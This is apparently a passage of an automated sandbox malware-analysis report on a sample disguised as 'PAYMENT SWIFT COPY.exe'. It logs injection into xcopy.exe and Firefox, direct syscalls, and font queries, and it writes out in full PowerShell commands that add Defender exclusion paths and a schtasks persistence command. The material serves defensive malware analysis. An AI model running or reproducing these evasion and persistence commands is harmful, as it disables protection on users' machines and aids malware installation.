Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h] | 8_2_018D6A50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h] | 8_2_018D6A50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h] | 8_2_018D6A50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D6A50 mov eax, dword ptr fs:[00000030h] | 8_2_018D6A50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeNtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe protection: execute and read and write
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exeThread register set: target process: 7980
                Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess created: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe"Jump to behavior
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: drfYhRLxnrcfFY.exe, 0000000E.00000002.4140553267.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000000.1789269157.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4140667170.00000000019C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\comic.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\comici.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\constan.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\constani.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\cour.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\couri.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\framd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\impact.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\taile.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation (repeated 2 times)
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation (repeated 2 times)
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\pala.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\palai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\palab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf | VolumeInformation
